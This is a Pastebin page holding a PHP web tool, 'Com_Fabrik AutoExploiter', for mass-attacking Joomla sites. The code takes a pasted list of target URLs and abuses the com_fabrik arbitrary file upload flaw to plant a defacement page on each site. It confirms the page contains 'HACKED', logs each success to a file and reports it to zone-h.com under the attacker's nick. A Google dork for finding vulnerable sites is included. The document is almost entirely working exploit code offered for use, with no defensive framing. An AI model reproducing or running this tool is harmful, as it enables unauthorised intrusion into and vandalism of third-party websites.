Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <head><title>Com_Fabrik AutoExploiter ~</title></head>
- <link href='https://fonts.googleapis.com/css?family=Ubuntu' rel='stylesheet' type='text/css'>
- <style type="text/css">
- body { background:black;font-family: Ubuntu ; color:#fff; padding:50px}
- .text {width:600px;height:200px;font-family: Ubuntu ; border: 1px solid darkred; }
- .btn {background:#b70505;color:white;border: 1px solid #000; padding:6px 6px 6px 6px;font-family: Ubuntu ;}
- .btn:hover {background:#c0bfbf;color:#000000; font-family: Ubuntu ; }
- </style>
- <center> <font new size="5">Com_Fabrik AutoExploiter ~</font><br>
- <form action="" method="POST">
- <textarea class="text" name="sites"></textarea>
- <br>
- <input class="btn" type="submit" value="door" name="die">
- </form>
- </center>
- <?php
- /** webBased By UstadCage_48 **/
- /**
- Joomla Component com_fabrik Arbitrary File Upload
- Author: Et04 & bL@cKID
- Google Dork
- inurl:/index.php?option=com_fabrik
- Auto Exploiter (Auto Upload & Auto Submit Zone-H)
- Coded by: L0c4lh34rtz - IndoXploit
- */
- Class IDX_Fabrik {
- public $url;
- /* File deface anda dalam folder yang sama dengan tools ini */
- private $file = "48.htm";
- /* Nick Hacker Kalian / Nick Zone -H Kalian */
- /* Pastikan dalam script deface kalian terdapat kata HACKED */
- public $hacker = "USTADCAGE_48";
- public function validUrl() {
- if(!preg_match("/^http:\/\//", $this->url) AND !preg_match("/^https:\/\//", $this->url)) {
- $url = "http://".$this->url;
- return $url;
- } else {
- return $this->url;
- }
- }
- public function curl($url, $data = null, $headers = null, $cookie = true) {
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
- curl_setopt($ch, CURLOPT_URL, $url);
- curl_setopt($ch, CURLOPT_USERAGENT, "IndoXploitTools/1.1");
- //curl_setopt($ch, CURLOPT_VERBOSE, TRUE);
- curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
- curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
- curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
- curl_setopt($ch, CURLOPT_TIMEOUT, 5);
- if($data !== null) {
- curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "POST");
- curl_setopt($ch, CURLOPT_POST, TRUE);
- curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
- }
- if($headers !== null) {
- curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
- }
- if($cookie === true) {
- curl_setopt($ch, CURLOPT_COOKIE, TRUE);
- curl_setopt($ch, CURLOPT_COOKIEFILE, "cookie.txt");
- curl_setopt($ch, CURLOPT_COOKIEJAR, "cookie.txt");
- }
- $exec = curl_exec($ch);
- $info = curl_getinfo($ch);
- curl_close($ch);
- return (object) [
- "response" => $exec,
- "info" => $info
- ];
- }
- public function exploit() {
- $url = $this->url."/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload";
- //$post = $this->curl($url, ["file" => "@L0c.htm"], null, false);
- $post = @shell_exec("curl --silent --connect-timeout 5 -X POST -F \"file=@".$this->file."\" \"$url\"");
- $result = (object) json_decode($post, true);
- if(isset($result->error)) {
- print "# ".parse_url($this->url, PHP_URL_HOST)." <font color=red>[FAILED]</font><br>";
- } else {
- if(isset($result->uri)) {
- if(preg_match("/hacked/i", $this->curl($result->uri)->response)) {
- print "# ".$result->uri." <font color=green>[OK]</font><br>";
- $this->zoneh($result->uri);
- $this->save($result->uri);
- }
- }
- }
- }
- public function zoneh($url) {
- $post = $this->curl("http://www.zone-h.com/notify/single", "defacer=".$this->hacker."&domain1=$url&hackmode=1&reason=1&submit=Send",null,false);
- if(preg_match("/color=\"red\">(.*?)<\/font><\/li>/i", $post->response, $matches)) {
- if($matches[1] === "ERROR") {
- preg_match("/<font color=\"red\">ERROR:<br\/>(.*?)<br\/>/i", $post->response, $matches2);
- print "# Zone-H ($url) <font color=red>[ERROR]</font><br><br>";
- } else {
- print "# Zone-H ($url) <font color=green>[OK]</font><br><br>";
- }
- }
- }
- public function save($isi) {
- $handle = fopen("result_fabrik.txt", "a+");
- fwrite($handle, "$isi<br>");
- fclose($handle);
- }
- }
- $fabrik = new IDX_Fabrik();
- if($_POST['die']){
- $open = explode("\n",$_POST['sites']);
- foreach($open as $list) {
- $fabrik->url = trim($list);
- $fabrik->url = $fabrik->validUrl();
- echo $fabrik->exploit();
- }
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement